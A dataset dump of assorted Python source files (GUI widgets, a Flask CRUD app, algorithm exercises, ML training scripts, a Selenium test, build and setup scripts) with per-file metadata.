\"\"\" Create the widget. \"\"\"\n\n # Base class constructor.\n super(CommandBindingWidget, self).__init__(**traits)\n\n # Create the toolkit-specific control that represents the widget.\n self.control = self._create_control(self.parent)\n\n #### 'AddCommandBindingWidget' protocol ####################################\n\n # The command binding that we are editing.\n command_binding = Instance(CommandBinding)\n \n #### Protected 'Widget' protocol ##########################################\n\n def _create_control(self, parent):\n \"\"\" Create the widget's toolkit-specific control. \"\"\"\n\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n panel = wx.Panel(parent, -1)\n panel.SetSizer(sizer)\n panel.SetAutoLayout(True)\n\n key_combination_control = self._create_key_combination_control(\n panel, self.command_binding\n )\n sizer.Add(key_combination_control, 0, wx.RIGHT, 5)\n\n factory_name_control = self._create_command_factory_name_control(\n panel, self.command_binding\n )\n sizer.Add(factory_name_control, 1, wx.EXPAND)\n\n sizer.Fit(panel)\n return panel\n\n #### Private protocol ######################################################\n\n # Used to import command factories.\n _import_manager = Instance(ImportManager, ())\n\n def _create_command_factory_name_control(self, parent, command_binding):\n \"\"\" Create a control for the command factory name. \"\"\"\n\n command_factory_name = command_binding.command_factory_name\n \n text_ctrl = wx.TextCtrl(parent, -1, command_factory_name)\n\n self._set_command_factory_tooltip(\n text_ctrl, command_binding.command_factory_name\n )\n\n def text_changed(event):\n command_binding.command_factory_name = text_ctrl.GetValue()\n\n self._set_command_factory_tooltip(\n text_ctrl, command_binding.command_factory_name\n )\n event.Skip()\n \n text_ctrl.Bind(wx.EVT_TEXT, text_changed)\n\n return text_ctrl\n\n def _set_command_factory_tooltip(self, control, command_factory_name):\n \"\"\" Set the command factory tooltip on a control. 
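The tooltip text is the docstring of the command factory named by\n        'command_factory_name' (looked up via '_get_command_factory_docstring').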
\"\"\"\n\n tool_tip = wx.ToolTip(\n tip=self._get_command_factory_docstring(command_factory_name)\n )\n control.SetToolTip(tool_tip)\n \n def _get_command_factory_docstring(self, command_factory_name):\n \"\"\" Return the docstring for the command factory with the given name.\n\n \"\"\"\n\n try:\n command_factory = self._import_manager.import_symbol(\n command_factory_name\n )\n docstring = command_factory.__doc__\n \n except:\n docstring = 'command factory does not exist!'\n \n return docstring\n \n def _create_key_combination_control(self, parent, command_binding):\n \"\"\" Create a control for the key code/modifier combination. \"\"\"\n\n key_code, modifiers = command_binding.key_combination\n \n style = wx.TE_PROCESS_TAB | wx.TE_PROCESS_ENTER\n text_ctrl = wx.TextCtrl(\n parent, -1, get_key_combination_name(key_code, modifiers),\n style = style\n )\n\n def character_entered(event):\n key_code = event.GetKeyCode()\n modifiers = event.GetModifiers()\n\n key_combination_name = get_key_combination_name(key_code, modifiers)\n\n text_ctrl.SetValue(key_combination_name)\n command_binding.key_combination = (key_code, modifiers)\n \n text_ctrl.Bind(wx.EVT_CHAR, character_entered)\n\n return text_ctrl\n\n#### EOF #######################################################################\n","sub_path":"source/pgv/red/ui/command_binding_widget.py","file_name":"command_binding_widget.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"189016290","text":"#!/usr/bin/env python\nimport pika\nimport time\n\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n 'rabbitmq.dev.twleansw.com'))\nchannel = connection.channel()\nfor i in range(0, 2) :\n\tchannel.queue_declare(queue='remote_power_switch')\n\tchannel.basic_publish(exchange='',\n\t routing_key='remote_power_switch',\n\t body='POWER_ON')\n\tprint(\" [x] Sent POWER_ON\")\n\ttime.sleep(5) # delays for 5 seconds\n\t\n\tchannel.queue_declare(queue='remote_power_switch')\n\tchannel.basic_publish(exchange='',\n\t routing_key='remote_power_switch',\n\t body='POWER_OFF')\n\ttime.sleep(5) # delays for 5 seconds\n\tprint(\" [x] Sent POWER_OFF\")\n\n","sub_path":"pi3_python/test_mq_send_switch_command.py","file_name":"test_mq_send_switch_command.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"288655822","text":"'''\nSolution:\n1. Insert all new possible words to the Trie.\n2. For each old word (split in the sentence by a space), check whether any subword is present in the Trie as a word\n and if present replace the sub-word with the old word and otherwise leave the old-word as is.\n3. Return the sentence conaining replaced words.\n\nTime Complexity: O(n * L) n is no. 
","sub_path":"ReplaceWords.py","file_name":"ReplaceWords.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"629983861","text":"from flask import Flask, render_template, redirect, url_for, request\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Restaurant, MenuItem\n\napp = Flask(__name__)\n\n#create engine to reference db\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind = engine)\nsession = DBSession()\n\n\n@app.route('/')\ndef hello():\n\toutput = \"\"\n\toutput += \"hello!\"\n\treturn output\n\n@app.route('/restaurants')\ndef restaurants():\n\trestaurants = session.query(Restaurant).all()\n\treturn render_template(\"restaurant.html\", restaurants = restaurants)\n\n@app.route('/restaurants/new', methods=['GET','POST'])\ndef newRestaurant():\n\tif request.method == 'POST':\n\t\tnewRestaurant = Restaurant(name = request.form['name'])\n\t\tsession.add(newRestaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template(\"newrestaurant.html\")\n\n\n@app.route('/restaurants/<int:restaurant_id>/edit', methods=['GET','POST'])\ndef editRestaurant(restaurant_id):\n\trestaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n\tif request.method == 'POST':\n\t\trestaurant.name = request.form[\"newName\"]\n\t\tsession.add(restaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template('editrestaurant.html',restaurant = restaurant)\n\n\n@app.route('/restaurants/<int:restaurant_id>/delete', methods=['GET','POST'])\ndef deleteRestaurant(restaurant_id):\n\trestaurant = session.query(Restaurant).filter_by(id = restaurant_id).one()\n\tif request.method == 'POST':\n\t\tsession.delete(restaurant)\n\t\tsession.commit()\n\t\treturn redirect(url_for('restaurants'))\n\treturn render_template('deleterestaurant.html',restaurant=restaurant)\n\n\n\n@app.route('/restaurants/<int:restaurant_id>/menu')\ndef restaurantMenu(restaurant_id):\n\titems = session.query(MenuItem).filter_by(restaurant_id = restaurant_id).all()\n\treturn render_template('menu.html',items = items)\n\n@app.route('/restaurants/<int:restaurant_id>/menu/new')\ndef newMenuItem(restaurant_id):\n\treturn \"creating a new menu item\"\n\n@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/edit')\ndef editMenuItem(restaurant_id, menu_id):\n\treturn \"editing menu item with id\"\n\n@app.route('/restaurants/<int:restaurant_id>/menu/<int:menu_id>/delete')\ndef deleteMenuItem(restaurant_id, menu_id):\n\treturn \"confirmation for deleting menu item with id\"\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run(host='0.0.0.0', port=5000)","sub_path":"vagrant/Lesson5/restaurantserver.py","file_name":"restaurantserver.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"31934968","text":"from collections import deque\nT=int(input())\n\ndef bfs(x,y):\n    global cnt\n    queue=deque()\n    queue.append((x,y))\n    cnt=0\n    \n    # visited[x][y]=True\n    while queue:\n        x,y=queue.popleft()\n        cnt+=1\n        for i in range(4):\n            nx=x+dx[i]\n            ny=y+dy[i]\n            if nx>=N or ny>=M or nx<0 or ny<0:\n                continue\n            if graph[nx][ny]==0:\n                continue\n            if graph[nx][ny]==1:\n                graph[nx][ny]=0\n                queue.append((nx,ny))\n    return cnt\n
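    \n# Each BFS call below clears one 4-directionally connected patch of cabbages,\n# so the number of calls made equals the number of worms needed per test case.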
\nfor t in range(T):\n    count=0\n    dx=[-1,1,0,0]\n    dy=[0,0,-1,1]\n    M,N,K=map(int,input().split()) # width, height, number of cabbage positions\n    graph=[[0]*(M+1) for _ in range(N+1)]\n    \n    for k in range(K):\n        x,y=map(int,input().split())\n        graph[y][x]=1 # x indexes the width, y the height\n    \n    for i in range(N+1): # i runs over rows (height), j over columns (width)\n        for j in range(M+1):\n            if graph[i][j]==1:\n                # print(bfs(i,j))\n                bfs(i,j)\n                count+=1\n    \n    print(count)","sub_path":"baekjoon/단계별 문제/1012.py","file_name":"1012.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"412345666","text":"import glob\nimport numpy as np\n\nfiles = glob.glob('./codedata/*/*', recursive=True)\n\n# Split files into test/train set\nnp.random.seed(1000) # For reproducibility\nnp.random.shuffle(files)\nN = int(float(len(files))*0.8) # Do an 80-20 split for training/validation\n\ndata = dict(\n    train=files[:N],\n    valid=files[N:],\n)\n\nnum_nq_examples = dict(train=N, valid=len(files)-N)\n\nprint(num_nq_examples)\n
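# e.g. with 1,000 files this prints {'train': 800, 'valid': 200}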
","sub_path":"globit.py","file_name":"globit.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"505681564","text":"from tkinter import *\r\nroot = Tk()\r\n\r\nroot.geometry('300x200')\r\nroot.title(\" ATTRIBUTES TUTORIAL \")\r\n# start attributes\r\n'''\r\nimportant label attributes\r\ntext-adds the text\r\nbg-background\r\nfg-foreground\r\nfont-set the font\r\npadx-x padding\r\npady-y padding\r\nrelief-borderstyling-SUNKEN,RAISED,GROOVE,RIDGE\r\n\r\n\r\nimportant pack attributes\r\nanchor=nw,ew,es,sw,etc\r\nside=top,bottom,left,right\r\nfill x & Y\r\npadding- x & y \r\n'''\r\nsaqib = Label(text='''“Dream is not that which \r\nyou see while sleeping it is\r\n something that does not let you sleep.”\r\n― A P J Abdul Kalam''', bg='orange', fg='blue', padx=15, pady=50, font=\"comicsansms 19 bold\", borderwidth=5, relief=SUNKEN)\r\n\r\nsaqib.pack(side=BOTTOM, anchor=\"sw\", fill=X, padx=20, pady=50)\r\nroot.mainloop()\r\n","sub_path":"attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"123515168","text":"import os\nimport sys\n\n\nfiles = [\n\t\"Server.cs\",\n\t\"Threading.cs\",\n\t\"Logger.cs\",\n\t\"ProtocolFormat.cs\",\n\t\"NetworkCommand.cs\",\n\t\"Constants.cs\",\n\t\"BinaryConverter.cs\",\n\t\"NetworkName.cs\"\n]\n\nbuild_exe = \"--exe\" in sys.argv\n\n# if \"--exe\" in sys.argv:\n# \tprint (\"Building standalone server\")\n# \tcall = \"csc -out:Server2.exe Program.cs -r:MorkoNetwork.dll\"\n# else:\n\nprint (\"Building MorkoNetwork library\")\ncall = \"csc -out:MorkoNetwork.dll -unsafe -debug -target:library {}\".format(\" \".join(files))\n\nos.system(call)\n","sub_path":"Network/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"287985369","text":"import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nimport tensorflow as tf\nimport pandas as pd\n\n\n# In[271]:\n\n\ndef model(num_units, dropout = 0.0):\n    \n    classifier = Sequential()\n    classifier.add(Dense(4*num_units,activation='relu',kernel_initializer='uniform', input_dim = 4039))\n    classifier.add(Dropout(dropout))\n    classifier.add(Dense(2*num_units, activation = 'relu', kernel_initializer='uniform'))\n    classifier.add(Dropout(dropout))\n    classifier.add(Dense(num_units, activation = 'relu', kernel_initializer='uniform'))\n    classifier.add(Dense(1, activation='sigmoid', kernel_initializer='uniform'))\n    return classifier\n
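\n\n# The stack narrows from 4*num_units down to num_units and ends in a single\n# sigmoid unit, so the network outputs a probability for the binary\n# cross-entropy objective compiled below.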
\n\n# In[272]:\n\n\nclassifier = model(5, 0.3)\n\n\n# In[273]:\n\n\noptimizer = keras.optimizers.Adam(lr = 0.0001)\n\n\n# In[274]:\n\n\nclassifier.compile(optimizer=optimizer,loss='binary_crossentropy',metrics=['accuracy'])\n\n\n# In[275]:\n\n\nclassifier.fit(xTrain,yTrain,batch_size = 128, epochs = 200)\n\n\n# In[276]:\n\n\ny_p = classifier.predict(xTrain)\n\n\n# In[277]:\n\n\ny_p_1 = classifier.predict(xval)\n\n\n# In[278]:\n\n\nerror = 0\n#y_pred_1 = y_pred[:, 1]\nj = 0\nfor i in yTrain:\n    #print(j)\n    error1 = i - y_p[j][0]\n    #print(str(i) + \" \" + str(y_pred_1[j])+\" \" + str(abs(error1)))\n    error = error + abs(error1)\n    j = j +1\n\nmse = error/len(y_p)\nprint(mse)\nprint(1 /(1+mse))\n\n\n# In[279]:\n\n\nerror = 0\n#y_pred_1 = y_pred[:, 1]\nj = 0\nfor i in yval:\n    #print(j)\n    error1 = i - y_p_1[j][0]\n    #print(str(i) + \" \" + str(y_pred_1[j])+\" \" + str(abs(error1)))\n    error = error + abs(error1)\n    j = j +1\n\nmse = error/len(y_p_1)\nprint(mse)\nprint(1 /(1+mse))\n\n\n# In[280]:\n\n\ny_p_2 = classifier.predict(X_test)\n\n\n# In[281]:\n\n\nprint(y_p_2)\n\n\n# In[299]:\n\n\nprint(id_test)\n\nprint(len(y_p_2))\nid_test.count()\n\n\n# In[301]:\n\n\nid_test.head()\n\n\n# In[313]:\n\n\nids = id_test.iloc[:].values\nprint(ids)\n\n\n# In[323]:\n\n\nv_id = []\nj = 0\n\nfor i in ids:\n    if not pd.isnull(i):\n        v_id.append(j)\n    j = j+1\n\n\n# In[324]:\n\n\nprint(v_id)\n\n\n# In[325]:\n\n\npout = y_p_2[v_id]\niout = ids[v_id]\n\n\n# In[326]:\n\n\npredictions = pd.DataFrame(pout, columns=['is_goal'])\nidss = pd.DataFrame(iout, columns=['shot_id_number'])\npredictions = pd.concat((idss, predictions), axis = 1)\npredictions.to_csv('result1.csv', sep=\",\", index = False)\n\n\n","sub_path":"Nn.py","file_name":"Nn.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"650781147","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author: ChenHanping\n@Email:\n@QQ:\n\n@date: 2019/12/3\n@description:\n\"\"\"\nimport json\nimport copy\nfrom datetime import datetime,timedelta\nimport ctx\n# from src import ctx\nfrom service.handlers.base import BaseHandler\nfrom utils import api_util\n\ndef _db():\n    return ctx.modledb['model_result_simulation']\n\ndef tt(date):\n    # convert a datetime to a 'T%H%M' string, with minutes rounded down to 15\n    at = ((date.minute) // 15) * 15\n    if at==0:\n        at='00'\n    t = date.strftime('T%H')+str(at)\n    return t\n
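\n# For example, tt(datetime(2019, 12, 3, 9, 40)) returns 'T0930', and any minute\n# value below 15 maps to the 'T%H00' slot.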
\ndef conversion(target1,date,t,staTime,endTime):\n    DATA = {}\n    res = []\n    # forecast data\n    for target in target1:\n        statusYC = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 1, 'SCADATYPE': 5}\n        frequencyYC = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 1, 'SCADATYPE': 7}\n        if target == 'PMP-1':\n            for v in _db().find_one(frequencyYC, {'_id': 0, t: 1}).values():\n                for i in v:\n                    if i['time'] < endTime:\n                        DATA['id'] = target\n                        DATA['time'] = i['time']\n                        DATA['status'] = i['status']\n                        DATA['frequency'] = i['frequency']\n                        Date = copy.copy(DATA)\n                        res.append(Date)\n        else:\n            for a in _db().find_one(statusYC, {'_id': 0, t: 1}).values():\n                for i in a:\n                    if i['time'] < endTime:\n                        DATA['id'] = target\n                        DATA['time'] = i['time']\n                        DATA['status'] = i['status']\n                        DATA['frequency'] = i['frequency']\n                        Date = copy.copy(DATA)\n                        res.append(Date)\n    # back-calculated (historical) data\n    for target in target1:\n        statusHS = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 0, 'SCADATYPE': 5}\n        # frequencyHS = {'TARGET_ID': target, 'DATA_DATE': date, 'DATA_TYPE': 0, 'SCADATYPE': 7}\n        for v in _db().find_one(statusHS, {'_id': 0, t: 1}).values():\n            res2 = [m for m in v]\n            res2.sort(key=lambda x: x['time'], reverse=True)\n            for m in res2:\n                DATA['id'] = target\n                DATA['time'] = m['time']\n                DATA['status'] = m['status']\n                if DATA['time'] < staTime:\n                    DATA['time'] = staTime + \" 00:00:00\"\n                    Date = copy.copy(DATA)\n                    res.append(Date)\n                    break\n                Date = copy.copy(DATA)\n                res.append(Date)\n    # sort by time\n    res.sort(key=lambda x: x['time'])\n    return res\n\nclass SchHadl(BaseHandler):\n    async def get(self):\n        # get the target id(s)\n        target = self.get_argument('target_id', None)\n        if not target:\n            self.return_failed()\n            return\n        target1 = target.split(',')\n        # get the time; fall back to the current time if it is empty\n        newTime = self.get_argument('new_time', None)\n        if not newTime:\n            NTime = datetime.now()\n        else:\n            NTime = datetime.strptime(newTime, \"%Y-%m-%d %H:%M:%S\")\n        t = tt(NTime)\n        # get the date\n        date = NTime.strftime('%Y%m%d')\n        # start time and end time\n        staTime = NTime.strftime('%Y-%m-%d')\n        endTime = (NTime+timedelta(days=1)).strftime('%Y-%m-%d')\n        result = await api_util.call_blocking(conversion, target1,date,t,staTime,endTime)\n        self.write(json.dumps(result, ensure_ascii=False))\n\n\n\n\n","sub_path":"src/service/handlers/schedule_handler.py","file_name":"schedule_handler.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"546702562","text":"from selenium.webdriver.common.by import By\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\yordi\\Automation\\python-selenium-automation\\chromedriver.exe\")\ndriver.maximize_window()\ndriver.implicitly_wait(5)\n\n\ndriver.get('https://www.amazon.com/')\n\ndriver.find_element(By.ID, 'nav-cart-count-container').click()\n\nactual_result = driver.find_element(By.XPATH, \"//div[@class='a-row sc-your-amazon-cart-is-empty']/h2\").text\nexpected_result = 'Your Amazon Cart is empty'\nassert expected_result == actual_result, f'Expected {expected_result}, but got {actual_result}'","sub_path":"features/Test_amazon_cart.py","file_name":"Test_amazon_cart.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"119177163","text":"import numpy\nfrom fqe import Wavefunction\nimport cProfile\n\nif __name__ == '__main__':\n    norb = 10\n    nel = norb\n    sz = 0\n    h1e_spa = numpy.zeros((norb, norb), dtype=numpy.complex128)\n    h2e_spa = numpy.zeros((norb, norb, norb, norb), dtype=numpy.complex128)\n    h3e_spa = numpy.zeros((norb, norb, norb, norb, norb, norb),\n                          dtype=numpy.complex128)\n\n    for i in range(norb):\n        for j in range(norb):\n            for k in range(norb):\n                for l in range(norb):\n                    for m in range(norb):\n                        for n in range(norb):\n                            h3e_spa[i, j, k, l, m, n] += (i + l) * (j + m) * (\n                                k + n) * 0.002\n\n    wfn = Wavefunction([[nel, sz, norb]])\n    wfn.set_wfn(strategy='random')\n\n    cProfile.run('test = wfn.apply(tuple([h1e_spa, h2e_spa, h3e_spa]))',\n                 '3body.profile')\n    # test = wfn.apply(tuple([h1e_spa, h2e_spa, h3e_spa]))\n\n    # rdm3 = wfn.rdm123(wfn)\n    # energy = numpy.tensordot(h3e_spa, rdm3[2],\n    #                          axes=([0, 1, 2, 3, 4, 5], [0, 1, 2, 3, 4, 5]))\n    # print(energy)\n    import pstats\n    profile = pstats.Stats('3body.profile')\n    profile.sort_stats('cumtime')\n    profile.print_stats(30)\n","sub_path":"profiling/profile_3_body.py","file_name":"profile_3_body.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"43200693","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\nurlpatterns = [\n    path('', views.list,name='blog'),\n    path('/', views.post, name='post'),\n    #path('contact/', views.contact, name='contact'),\n    path('register/', views.register, name=\"register\"),\n    path('login/',auth_views.LoginView.as_view(template_name=\"pages/login.html\"), name=\"login\"),\n    path('logout/',auth_views.LogoutView.as_view(next_page='/'),name='logout'),\n]\n","sub_path":"webpython/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} {"seq_id":"264584098","text":"# Copyright 2018 The Pontem Authors. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Cloud SQL Replicator setup.\"\"\"\n\nfrom setuptools import find_packages\nfrom setuptools import setup\n\nfrom google.cloud.pontem.sql import replicator\n\nNAMESPACE_PACKAGES = [\n 'google',\n 'google.cloud'\n]\n\nREQUIRES = [\n 'absl-py>=0.6.1',\n 'future>=0.17.1',\n 'futures>=3.0.5',\n 'google-api-core>=1.6.0',\n 'google-api-python-client>=1.7.6',\n 'google-auth>=1.6.1',\n 'google-auth-httplib2>=0.0.3',\n 'google-cloud-core>=0.28.1',\n 'google-cloud-kms>=0.2.1',\n 'google-cloud-storage>=1.13.0',\n 'google-resumable-media>=0.3.1',\n 'googleapis-common-protos>=1.5.5',\n 'httplib2>=0.12.0',\n 'mysql-connector>=2.1.6',\n 'oauth2client>=4.1.3',\n 'PyYAML>=3.13',\n 'six>=1.11.0',\n]\n\nsetup(\n name='cloudsql-replicator',\n version=replicator.__version__,\n install_requires=REQUIRES,\n packages=find_packages(exclude=['tests']),\n namespace_packages=NAMESPACE_PACKAGES,\n license='Apache 2.0',\n entry_points={\n 'console_scripts': [\n 'sr=google.cloud.pontem.sql.replicator.cli.main:run',\n ]\n }\n)\n","sub_path":"CloudSQLReplicator/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"459945585","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n def __init__(self):\n super().__init__()\n\n # Layer 1\n self.conv1 = nn.Conv2d(3, 48, kernel_size=(11, 11), stride=(4, 4), padding=(2, 2))\n self.mp1 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n self.bn1 = nn.BatchNorm2d(48)\n # Layer 2\n self.conv2 = nn.Conv2d(48, 128, kernel_size=(5, 5), stride=(1, 1), padding=(2, 2))\n self.mp2 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n self.bn2 = nn.BatchNorm2d(128)\n # Layer 3\n self.conv3 = nn.Conv2d(128, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n # Layer 4\n self.conv4 = nn.Conv2d(192, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n # Layer 5\n self.conv5 = nn.Conv2d(192, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n self.mp3 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n\n def forward(self, inputs):\n inputs = F.relu(self.bn1(self.mp1(self.conv1(inputs))))\n inputs = F.relu(self.bn2(self.mp2(self.conv2(inputs))))\n inputs = F.relu(self.conv3(inputs))\n inputs = F.relu(self.conv4(inputs))\n inputs = F.relu(self.mp3(self.conv5(inputs)))\n\n return inputs\n\n\nclass AlexNet(nn.Module):\n def __init__(self, N):\n super().__init__()\n self.N = N\n\n # Encoder\n self.encoder_1 = Encoder()\n self.encoder_2 = Encoder()\n\n # Decoder\n self.fc6_1 = nn.Linear(2*128*6*6, 20)\n self.fc6_2 = nn.Linear(2*128*6*6, 20)\n self.fc7_1 = nn.Linear(40, 20)\n self.fc7_2 = nn.Linear(40, 20)\n self.fc8 = nn.Linear(40, 10)\n\n def forward(self, inputs):\n inputs_1 = self.encoder_1(inputs)\n inputs_2 = self.encoder_2(inputs)\n\n inputs_1 = inputs_1.view(self.N, -1)\n inputs_2 = inputs_2.view(self.N, -1)\n\n temp = 
torch.cat((inputs_1, inputs_2), dim=1)\n inputs_1 = temp.clone()\n inputs_2 = temp.clone()\n\n inputs_1 = F.relu(self.fc6_1(inputs_1))\n inputs_2 = F.relu(self.fc6_2(inputs_2))\n\n temp = torch.cat((inputs_1, inputs_2), dim=1)\n inputs_1 = temp.clone()\n inputs_2 = temp.clone()\n\n inputs_1 = F.relu(self.fc7_1(inputs_1))\n inputs_2 = F.relu(self.fc7_2(inputs_2))\n\n inputs = torch.cat((inputs_1, inputs_2), dim=1)\n inputs = self.fc8(inputs)\n\n return inputs\n\n\nclass CaffeNet(nn.Module):\n def __init__(self, N):\n super().__init__()\n self.N = N\n\n # Encoder\n self.encoder = Encoder()\n\n # Decoder\n self.fc6 = nn.Linear(128*6*6, 20)\n self.fc7 = nn.Linear(20, 20)\n self.fc8 = nn.Linear(20, 10)\n\n def forward(self, inputs):\n inputs = self.encoder(inputs)\n\n inputs = inputs.view(self.N, -1)\n inputs = F.relu(self.fc6(inputs))\n inputs = F.relu(self.fc7(inputs))\n inputs = self.fc8(inputs)\n\n return inputs\n\n\n# Training\nN = 32\nn_iterations = 100\ninputs = torch.rand(N, 3, 224, 224)\ntargets = torch.randint(10, (N, 1))\ntargets = targets[:, 0]\ntargets = targets.long()\n\nmodel = CaffeNet(N)\nloss_function = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters())\n\n# torch.onnx.export(model, inputs, 'caffenet.onnx', verbose=True) # open in Netron\n\nfor i in range(n_iterations):\n # Forward\n optimizer.zero_grad()\n outputs = model(inputs)\n\n # Loss\n loss = loss_function(outputs, targets)\n\n # Backwards\n loss.backward()\n optimizer.step()\n\n print('iteration:', i, 'loss:', loss.detach().numpy())","sub_path":"example-2.py","file_name":"example-2.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"389614756","text":"# Hexadecimal operations in python with examples\n# import the modules required for the script\nimport base64\n\nExamples = [\"Cat\",\"Mouse\",\"Monitor\"]\n\n\n# display first output line\n# Word\tASCII\tBASE64\nprint(\"Word\\t\",\" ASCII\\t\\t\\t\\t\",\"Base64\")\n# Iterate through the elements in Examples List\nfor ex in Examples:\n\texEnc = \" \"\n\tfor byte in ex.encode():\n\t\texEnc += format(byte,'08b')+\" \"\n\tprint(ex,exEnc,\"\\t\",base64.b64encode(ex.encode()))\n\n","sub_path":"CORE/Cryptography-100/Resources/Hex-AND-OR-XOR-Examples.py","file_name":"Hex-AND-OR-XOR-Examples.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"203182900","text":"# Author: Sebastien Dubois \n#\t\t for ALFA Group, CSAIL, MIT\n\n# The MIT License (MIT)\n# Copyright (c) 2015 Sebastien Dubois\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport matplotlib.pyplot as plt\nfrom iterations_needed import iterationsNeeded\nimport numpy as np\n\nfirst_exp = 4001\nlast_exp = 4050\ntest_name = \"MNIST\"\n\nthreshold = 0.5\nalpha = 0.5\n\n\nmean_iter_needed,q1_iter_needed,median_iter_needed,q3_iter_needed = \\\n\t\t\t\titerationsNeeded(test_name,first_exp,last_exp,threshold,alpha)\n\nabs = 95 + 0.05 * np.asarray(range(101))\n\nfig = plt.figure(figsize=(15,7))\nplt.plot(abs,median_iter_needed,'c')\nplt.plot(abs,q1_iter_needed,'c-.')\nplt.plot(abs[q3_iter_needed < 1000],q3_iter_needed[q3_iter_needed < 1000],'c-.')\nplt.title('Iterations needed')\nplt.xlabel('Percentage of maximum gain')\nplt.ylabel('Number of tested parameters')\nplt.show() ","sub_path":"GCP-HPO/Test/show_iterations_needed.py","file_name":"show_iterations_needed.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"378796342","text":"from typing import Tuple, Dict, Union, Optional, Any\nfrom torch_geometric.typing import NodeType, EdgeType, Metadata\n\nimport 